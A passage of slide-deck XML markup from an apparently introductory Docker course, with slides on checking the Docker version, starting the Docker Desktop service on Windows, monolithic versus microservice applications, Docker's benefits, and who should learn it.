            <a:endParaRPr b="1" sz="2397">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2397">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>2.1 win + r → cmd</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2397">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2397">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>2.2 docker -- version</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2397">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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76"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="601875"/>
            <a:ext cx="8611500" cy="960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5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to start docker service?</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1013" name="Google Shape;1013;p176"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="578500" y="2149175"/>
            <a:ext cx="8520600" cy="2881200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-380841" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="2398"/>
              <a:buFont typeface="Courier New"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2397">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Docker Desktop Icon Click Launch</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2397">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2397">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2397">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Win + R -&gt; services.msc</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2397">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2397">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>Find “Docker Desktop Service” → Start</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2397">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="7445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5580">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Applications</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="5580">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1019" name="Google Shape;1019;p177"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1733475" y="1743675"/>
            <a:ext cx="6666900" cy="2369100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-440055" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3600"/>
              <a:t>Monolithic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600"/>
              <a:t>Application </a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3600"/>
              <a:t>Eg.</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3600"/>
              <a:t>ReactJs,NextJs, VueJs, MERN</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
          <a:p>
            <a:pPr indent="-440055" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3600"/>
              <a:t>MicroService Applications</a:t>
            </a:r>
            <a:endParaRPr sz="36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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="621050" y="1743675"/>
            <a:ext cx="8472900" cy="236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solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We can put both (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Monolithic App</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and Microservice App) inside Docker Container</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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179"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="14244" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="454950"/>
            <a:ext cx="9144001" cy="42668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80"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270875" y="786700"/>
            <a:ext cx="8822100" cy="409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900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. Docker gives you virtual OS Environment.</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. MicroService App runs on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Isolated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Environment</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3. Deliver the application faster. </a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	No need worry about "Production/Test release failures"</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Now you can't say </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"Hey its working on my Local but not sure why its not working on production/test server :)".	</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4. Docker gives you a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>guaranteed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> same development environment on all 3 phase</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		1. Development (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1550">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Ubuntu 23.04</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> )</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		2. Testing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1550">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Ubuntu 23.04</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> )</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1900">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="990"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		3. Production </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1550">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Ubuntu 23.04</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> )</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1035" name="Google Shape;1035;p180"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270875" y="140725"/>
            <a:ext cx="81180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300">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Why we are learning Docker ?</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:schemeClr val="accent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81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="260675" y="4737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4500">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Who should learn Docker</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4500">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041" name="Google Shape;1041;p181"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616500" y="1627700"/>
            <a:ext cx="7077600" cy="2639400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-474821" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="3878"/>
              <a:buFont typeface="Roboto Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3877">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Developers (Front/Back Eng.)</a:t>
            </a:r>
            <a:endParaRPr sz="3877">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-474821" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="3878"/>
              <a:buFont typeface="Roboto Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3877">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>DevOps Engineer</a:t>
            </a:r>
            <a:endParaRPr sz="3877">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-474821" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="3878"/>
              <a:buFont typeface="Roboto Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3877">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Linux System Administrators</a:t>
            </a:r>
            <a:endParaRPr sz="3877">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-474821" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="3878"/>
              <a:buFont typeface="Roboto Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3877">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
